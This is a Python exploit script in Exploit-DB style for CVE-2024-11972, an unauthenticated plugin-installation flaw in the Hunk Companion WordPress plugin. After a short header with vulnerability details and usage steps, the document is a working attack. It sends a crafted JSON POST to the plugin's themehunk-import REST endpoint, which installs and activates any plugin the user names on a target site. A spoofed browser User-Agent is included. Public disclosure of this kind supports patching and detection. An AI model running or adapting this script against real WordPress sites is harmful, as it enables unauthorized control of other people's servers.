# Exploit Title: Hunk Companion Plugin 1.9.0 - Unauthenticated Plugin Installation # Date: 16 December, 2024 # Exploit Author: Jun Takemura # Author's GitHub: https://github.com/JunTakemura # Author's Blog: juntakemura.dev # Vendor Homepage: https://themehunk.com # Software Link: https://wordpress.org/plugins/hunk-companion/ # Version: Tested on Hunk Companion 1.8.8 # CVE: CVE-2024-11972 # Vulnerability Description: # Exploits a flaw in the Hunk Companion plugin's permission_callback for the # /wp-json/hc/v1/themehunk-import endpoint, allowing unauthenticated attackers # to install and activate arbitrary plugins from the WordPress.org repository. # Tested on: Ubuntu # Original vulnerability discovered by: Daniel Rodriguez # # Usage: # 1. Update `target_url` below with the target WordPress site's URL. # 2. Update `plugin_name` with the slug of the plugin you want to install. # 3. Run: python3 exploit.py # import requests from urllib.parse import urljoin # Update 'URL' with your target WordPress site URL, for example "http://localhost/wordpress" target_url = "URL" # Update 'NAME' with desired plugin's name (slug), for example "wp-query-console" plugin_name = "NAME" endpoint = "/wp-json/hc/v1/themehunk-import" url = urljoin(target_url, endpoint) payload = { "params": { "plugin": { plugin_name: "Plugin Label" }, "allPlugins": [ { plugin_name: f"{plugin_name}/{plugin_name}.php" } ], "themeSlug": "theme", "proThemePlugin": "plugin", "templateType": "free", "tmplFreePro": "theme", "wpUrl": target_url } } headers = { "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64)", "Content-Type": "application/json" } try: response = requests.post(url, json=payload, headers=headers, timeout=10) response.raise_for_status() # Raises an HTTPError if the response is not 2xx print(f"[+] Exploit sent successfully.") print(f"Response Status Code: {response.status_code}") print(f"Response Body: {response.text}") except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}")